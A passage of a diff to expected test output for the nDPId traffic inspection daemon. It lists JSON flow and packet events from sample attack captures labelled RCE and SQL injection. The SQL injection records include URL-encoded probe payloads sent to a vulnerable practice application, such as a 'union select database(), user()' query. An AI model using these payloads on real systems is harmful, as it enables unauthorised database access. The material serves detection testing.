+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":797,"packets-processed":797,"total-skipped-flows":0,"total-l4-data-len":138401,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":797,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":797,"total-idle-flows":797,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3191,"global_ts_msec":1576420278014} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 797/797 diff --git a/test/results/WebattackSQLinj.pcap.out b/test/results/WebattackSQLinj.pcap.out index fc108d36a..3fc3b32a0 100644 --- a/test/results/WebattackSQLinj.pcap.out +++ b/test/results/WebattackSQLinj.pcap.out @@ -1,59 +1,59 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1499348407419} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348407419,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348407419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"} -00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 